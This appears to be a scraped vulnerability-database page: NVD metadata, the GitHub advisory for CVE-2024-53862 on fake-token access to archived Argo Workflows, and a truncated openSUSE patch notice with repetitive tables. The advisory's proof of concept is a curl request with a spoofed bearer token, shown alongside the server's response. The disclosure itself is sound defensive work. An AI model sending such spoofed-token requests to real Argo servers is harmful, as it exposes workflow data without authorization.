"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2024-12-02T16:15:14.277",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
},
{
"lang": "en",
"value": "CWE-290"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-290"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GHSA-H36C-M3RF-34H9
Vulnerability from github – Published: 2024-12-02 22:17 – Updated: 2024-12-02 22:17
VLAI?
Summary
Access to Archived Argo Workflows with Fake Token in `client` mode
Details
Summary
When using --auth-mode=client, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: /api/v1/workflows/{namespace}/{name}
When using --auth-mode=sso, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: /api/v1/workflows/{namespace}/{name}
Details
No authentication is performed by the Server itself on client tokens[^1]. Authentication & authorization is instead delegated to the k8s API server.
However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a kubectl auth can-i check for respective methods.
In #12736 / v3.5.7 and #13021 / v3.5.8, the auth check was accidentally removed on the GET Workflow endpoint's fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token.
PoC
Configuration
Controller ConfigMap:
config: |
persistence:
archive: true
postgresql:
database: argoworkflows
host: db-host
passwordSecret:
key: postgresPassword
name: argo-wf-postgres-credentials
port: 5432
tableName: argo_workflows
userNameSecret:
key: username
name: argo-wf-postgres-credentials
Server: --auth-mode=client
Reproduction
Visit a completed, archived workflow URL with an invalid authorization token, this results in the workflow being displayed.
For example, directly query the API and retrieve the workflow data (where Bearer thisisatest is not a valid token):
curl -H 'Authorization: Bearer thisisatest' -v http://localhost:8000/api/v1/workflows/argo/hello-world-7tv5g
* Host localhost:8000 was resolved.
* IPv6: ::1
* IPv4: 127.0.0.1
* Trying [::1]:8000...
* Connected to localhost (::1) port 8000
> GET /api/v1/workflows/argo/hello-world-7tv5g HTTP/1.1
> Host: localhost:8000
> User-Agent: curl/8.7.1
> Accept: */*
> Authorization: Bearer thisisatest
>
* Request completely sent off
< HTTP/1.1 200 OK
< Content-Type: application/json
< Grpc-Metadata-Content-Type: application/grpc
< X-Ratelimit-Limit: 1000
< X-Ratelimit-Remaining: 999
< X-Ratelimit-Reset: Mon, 19 Aug 2024 20:44:27 UTC
< Date: Mon, 19 Aug 2024 20:44:26 GMT
< Transfer-Encoding: chunked
<
* Connection #0 to host localhost left intact
{
"metadata": {
"name": "hello-world-7tv5g",
"generateName": "hello-world-",
"namespace": "argo",
"uid": "e5868ab1-f820-4a9e-9407-162346a4ccb4",
"resourceVersion": "9982",
"generation": 3,
"creationTimestamp": "2024-08-13T23:59:20Z",
"labels": {
"workflows.argoproj.io/archive-strategy": "false",
"workflows.argoproj.io/completed": "true",
"workflows.argoproj.io/phase": "Succeeded",
"workflows.argoproj.io/workflow-archiving-status": "Persisted"
},
"annotations": {
"workflows.argoproj.io/description": "This is a simple hello world example.\n",
"workflows.argoproj.io/pod-name-format": "v2"
},
"managedFields": [
{
"manager": "argo",
"operation": "Update",
"apiVersion": "argoproj.io/v1alpha1",
"time": "2024-08-13T23:59:20Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:metadata": {
"f:annotations": {
".": {},
"f:workflows.argoproj.io/description": {}
},
"f:generateName": {},
"f:labels": {
".": {},
"f:workflows.argoproj.io/archive-strategy": {}
}
},
"f:spec": {}
}
},
{
"manager": "workflow-controller",
"operation": "Update",
"apiVersion": "argoproj.io/v1alpha1",
"time": "2024-08-13T23:59:30Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:metadata": {
"f:annotations": {
"f:workflows.argoproj.io/pod-name-format": {}
},
"f:labels": {
"f:workflows.argoproj.io/completed": {},
"f:workflows.argoproj.io/phase": {},
"f:workflows.argoproj.io/workflow-archiving-status": {}
}
},
"f:status": {}
}
}
]
},
"spec": {
"templates": [
{
"name": "hello-world",
"inputs": {},
"outputs": {},
"metadata": {},
"container": {
"name": "",
"image": "busybox",
"command": [
"echo"
],
"args": [
"hello world"
],
"resources": {}
}
}
],
"entrypoint": "hello-world",
"arguments": {},
"serviceAccountName": "argo-workflow"
},
"status": {
"phase": "Succeeded",
"startedAt": "2024-08-13T23:59:20Z",
"finishedAt": "2024-08-13T23:59:30Z",
"progress": "1/1",
"nodes": {
"hello-world-7tv5g": {
"id": "hello-world-7tv5g",
"name": "hello-world-7tv5g",
"displayName": "hello-world-7tv5g",
"type": "Pod",
"templateName": "hello-world",
"templateScope": "local/hello-world-7tv5g",
"phase": "Succeeded",
"startedAt": "2024-08-13T23:59:20Z",
"finishedAt": "2024-08-13T23:59:24Z",
"progress": "1/1",
"resourcesDuration": {
"cpu": 0,
"memory": 3
},
"outputs": {
"exitCode": "0"
},
"hostNodeName": "kind-control-plane"
}
},
"conditions": [
{
"type": "PodRunning",
"status": "False"
},
{
"type": "Completed",
"status": "True"
}
],
"resourcesDuration": {
"cpu": 0,
"memory": 3
},
"artifactRepositoryRef": {
"default": true,
"artifactRepository": {}
},
"artifactGCStatus": {
"notSpecified": true
},
"taskResultsCompletionStatus": {
"hello-world-7tv5g": true
}
}
}%
Impact
Users of the Server with --auth-mode=client and with persistence.archive: true are vulnerable to having Archived Workflows retrieved with a fake or spoofed token.
Users of the Server with --auth-mode=sso and with persistence.archive: true are vulnerable to users being able to access workflows they could not access before archiving.
[^1]: sso tokens, on the other hand, are immediately "authorized". The naming in the codebase is a bit confusing; it would be more appropriate to say "authenticated" in this case, as authorization is via SSO RBAC / SA matching / k8s API server. In this same section of the codebase, the client tokens are not authenticated, they are only validated. Authentication and authorization is done simultaneously for client tokens via the k8s API server.
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-workflows/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.5.7"
},
{
"fixed": "3.5.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-workflows/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.6.0"
},
{
"fixed": "3.6.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-53862"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": true,
"github_reviewed_at": "2024-12-02T22:17:55Z",
"nvd_published_at": "2024-12-02T16:15:14Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nWhen using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`\n\nWhen using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`\n\n### Details\n\nNo authentication is performed by the Server itself on `client` tokens[^1]. Authentication \u0026 authorization is instead delegated to the k8s API server.\nHowever, the [Workflow Archive](https://github.com/argoproj/argo-workflows/blob/52cca7e079a4f6d76db303ac550b1876e51b3865/server/workflowarchive/archived_workflow_server.go) does not interact with k8s, and so any token that [_looks_](https://github.com/argoproj/argo-workflows/blob/52cca7e079a4f6d76db303ac550b1876e51b3865/server/auth/mode.go#L37) [valid](https://github.com/argoproj/argo-workflows/blob/52cca7e079a4f6d76db303ac550b1876e51b3865/server/auth/gatekeeper.go#L185) will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does [the equivalent of a `kubectl auth can-i`](https://github.com/argoproj/argo-workflows/blob/52cca7e079a4f6d76db303ac550b1876e51b3865/server/workflowarchive/archived_workflow_server.go#L50) check for respective methods.\n\nIn #12736 / v3.5.7 and #13021 / v3.5.8, the auth check was accidentally removed on the GET Workflow endpoint\u0027s fallback to archived workflows on [these lines](https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715), allowing archived workflows to be retrieved with a fake token.\n\n### PoC\n\n#### Configuration\n\nController `ConfigMap`:\n```yaml\n config: |\n persistence:\n archive: true\n postgresql:\n database: argoworkflows\n host: db-host\n passwordSecret:\n key: postgresPassword\n name: argo-wf-postgres-credentials\n port: 5432\n tableName: argo_workflows\n userNameSecret:\n key: username\n name: argo-wf-postgres-credentials\n```\n\nServer: `--auth-mode=client`\n\n#### Reproduction\n\nVisit a completed, archived workflow URL with an invalid authorization token, this results in the workflow being displayed.\n\nFor example, directly query the API and retrieve the workflow data (where `Bearer thisisatest` is not a valid token):\n\n```sh\ncurl -H \u0027Authorization: Bearer thisisatest\u0027 -v http://localhost:8000/api/v1/workflows/argo/hello-world-7tv5g\n```\n\n\u003cdetails\u003e\u003csummary\u003eResults in a returned workflow:\u003c/summary\u003e\n\n```\n* Host localhost:8000 was resolved.\n* IPv6: ::1\n* IPv4: 127.0.0.1\n* Trying [::1]:8000...\n* Connected to localhost (::1) port 8000\n\u003e GET /api/v1/workflows/argo/hello-world-7tv5g HTTP/1.1\n\u003e Host: localhost:8000\n\u003e User-Agent: curl/8.7.1\n\u003e Accept: */*\n\u003e Authorization: Bearer thisisatest\n\u003e\n* Request completely sent off\n\u003c HTTP/1.1 200 OK\n\u003c Content-Type: application/json\n\u003c Grpc-Metadata-Content-Type: application/grpc\n\u003c X-Ratelimit-Limit: 1000\n\u003c X-Ratelimit-Remaining: 999\n\u003c X-Ratelimit-Reset: Mon, 19 Aug 2024 20:44:27 UTC\n\u003c Date: Mon, 19 Aug 2024 20:44:26 GMT\n\u003c Transfer-Encoding: chunked\n\u003c\n* Connection #0 to host localhost left intact\n{\n \"metadata\": {\n \"name\": \"hello-world-7tv5g\",\n \"generateName\": \"hello-world-\",\n \"namespace\": \"argo\",\n \"uid\": \"e5868ab1-f820-4a9e-9407-162346a4ccb4\",\n \"resourceVersion\": \"9982\",\n \"generation\": 3,\n \"creationTimestamp\": \"2024-08-13T23:59:20Z\",\n \"labels\": {\n \"workflows.argoproj.io/archive-strategy\": \"false\",\n \"workflows.argoproj.io/completed\": \"true\",\n \"workflows.argoproj.io/phase\": \"Succeeded\",\n \"workflows.argoproj.io/workflow-archiving-status\": \"Persisted\"\n },\n \"annotations\": {\n \"workflows.argoproj.io/description\": \"This is a simple hello world example.\\n\",\n \"workflows.argoproj.io/pod-name-format\": \"v2\"\n },\n \"managedFields\": [\n {\n \"manager\": \"argo\",\n \"operation\": \"Update\",\n \"apiVersion\": \"argoproj.io/v1alpha1\",\n \"time\": \"2024-08-13T23:59:20Z\",\n \"fieldsType\": \"FieldsV1\",\n \"fieldsV1\": {\n \"f:metadata\": {\n \"f:annotations\": {\n \".\": {},\n \"f:workflows.argoproj.io/description\": {}\n },\n \"f:generateName\": {},\n \"f:labels\": {\n \".\": {},\n \"f:workflows.argoproj.io/archive-strategy\": {}\n }\n },\n \"f:spec\": {}\n }\n },\n {\n \"manager\": \"workflow-controller\",\n \"operation\": \"Update\",\n \"apiVersion\": \"argoproj.io/v1alpha1\",\n \"time\": \"2024-08-13T23:59:30Z\",\n \"fieldsType\": \"FieldsV1\",\n \"fieldsV1\": {\n \"f:metadata\": {\n \"f:annotations\": {\n \"f:workflows.argoproj.io/pod-name-format\": {}\n },\n \"f:labels\": {\n \"f:workflows.argoproj.io/completed\": {},\n \"f:workflows.argoproj.io/phase\": {},\n \"f:workflows.argoproj.io/workflow-archiving-status\": {}\n }\n },\n \"f:status\": {}\n }\n }\n ]\n },\n \"spec\": {\n \"templates\": [\n {\n \"name\": \"hello-world\",\n \"inputs\": {},\n \"outputs\": {},\n \"metadata\": {},\n \"container\": {\n \"name\": \"\",\n \"image\": \"busybox\",\n \"command\": [\n \"echo\"\n ],\n \"args\": [\n \"hello world\"\n ],\n \"resources\": {}\n }\n }\n ],\n \"entrypoint\": \"hello-world\",\n \"arguments\": {},\n \"serviceAccountName\": \"argo-workflow\"\n },\n \"status\": {\n \"phase\": \"Succeeded\",\n \"startedAt\": \"2024-08-13T23:59:20Z\",\n \"finishedAt\": \"2024-08-13T23:59:30Z\",\n \"progress\": \"1/1\",\n \"nodes\": {\n \"hello-world-7tv5g\": {\n \"id\": \"hello-world-7tv5g\",\n \"name\": \"hello-world-7tv5g\",\n \"displayName\": \"hello-world-7tv5g\",\n \"type\": \"Pod\",\n \"templateName\": \"hello-world\",\n \"templateScope\": \"local/hello-world-7tv5g\",\n \"phase\": \"Succeeded\",\n \"startedAt\": \"2024-08-13T23:59:20Z\",\n \"finishedAt\": \"2024-08-13T23:59:24Z\",\n \"progress\": \"1/1\",\n \"resourcesDuration\": {\n \"cpu\": 0,\n \"memory\": 3\n },\n \"outputs\": {\n \"exitCode\": \"0\"\n },\n \"hostNodeName\": \"kind-control-plane\"\n }\n },\n \"conditions\": [\n {\n \"type\": \"PodRunning\",\n \"status\": \"False\"\n },\n {\n \"type\": \"Completed\",\n \"status\": \"True\"\n }\n ],\n \"resourcesDuration\": {\n \"cpu\": 0,\n \"memory\": 3\n },\n \"artifactRepositoryRef\": {\n \"default\": true,\n \"artifactRepository\": {}\n },\n \"artifactGCStatus\": {\n \"notSpecified\": true\n },\n \"taskResultsCompletionStatus\": {\n \"hello-world-7tv5g\": true\n }\n }\n}%\n```\n\n\u003c/details\u003e\n\n\n### Impact\n\nUsers of the Server with `--auth-mode=client` and with `persistence.archive: true` are vulnerable to having Archived Workflows retrieved with a fake or spoofed token.\n\nUsers of the Server with `--auth-mode=sso` and with `persistence.archive: true` are vulnerable to users being able to access workflows they could not access before archiving.\n\n[^1]: `sso` tokens, on the other hand, are [immediately \"authorized\"](https://github.com/argoproj/argo-workflows/blob/52cca7e079a4f6d76db303ac550b1876e51b3865/server/auth/gatekeeper.go#L207). The naming in the codebase is a bit confusing; it would be more appropriate to say \"authenticated\" in this case, as authorization is via SSO RBAC / SA matching / k8s API server. In this same section of the codebase, the `client` tokens are not authenticated, they are only validated. Authentication and authorization is done simultaneously for `client` tokens via the k8s API server.",
"id": "GHSA-h36c-m3rf-34h9",
"modified": "2024-12-02T22:17:55Z",
"published": "2024-12-02T22:17:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-53862"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715"
},
{
"type": "PACKAGE",
"url": "https://github.com/argoproj/argo-workflows"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Access to Archived Argo Workflows with Fake Token in `client` mode"
}
OPENSUSE-SU-2024:14567-1
Vulnerability from csaf_opensuse - Published: 2024-12-11 00:00 - Updated: 2024-12-11 00:00Summary
govulncheck-vulndb-0.0.20241209T183251-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: govulncheck-vulndb-0.0.20241209T183251-1.1 on GA media
Description of the patch: These are all security issues fixed in the govulncheck-vulndb-0.0.20241209T183251-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2024-14567
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
8.1 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
5.3 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
8.1 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
low
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
low
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
low
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
